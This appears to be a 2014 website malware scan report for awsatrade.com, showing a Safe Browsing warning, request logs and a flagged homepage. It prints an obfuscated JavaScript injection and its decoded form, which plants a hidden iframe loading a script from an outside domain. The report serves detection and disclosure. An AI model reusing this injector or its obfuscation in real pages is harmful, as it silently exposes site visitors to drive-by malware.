Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=awsatrade.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://awsatrade.com/ | 200 OK Content-Length: 2055 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i78i71i80i72i80i73i78i7i62i78i8i60i72i78i71i77i12i7i73i65 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://unwowpu.eu/count3.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://unwowpu.eu/count3.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribu <iframe src='http://unwowpu.eu/count3.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://awsatrade.com/test404page.js | 404 Not Found Content-Length: 396 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: awsatrade.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 May 2014 18:45:02 GMT
Accept-Ranges: bytes
ETag: "39800b-807-4bc943ded82c0"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 2055
Content-Type: text/html
Last-Modified: Sun, 01 Apr 2012 01:46:27 GMT
...2055 bytes of data.
GET / HTTP/1.1
Host: awsatrade.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 May 2014 18:45:02 GMT
Accept-Ranges: bytes
ETag: "39800b-807-4bc943ded82c0"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 2055
Content-Type: text/html
Last-Modified: Sun, 01 Apr 2012 01:46:27 GMT
...2055 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: awsatrade.com
Referer: http://www.google.com/search?q=awsatrade.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: awsatrade.com
Referer: http://www.google.com/search?q=awsatrade.com
Result:
The result is similar to the first query. There are no suspicious redirects found.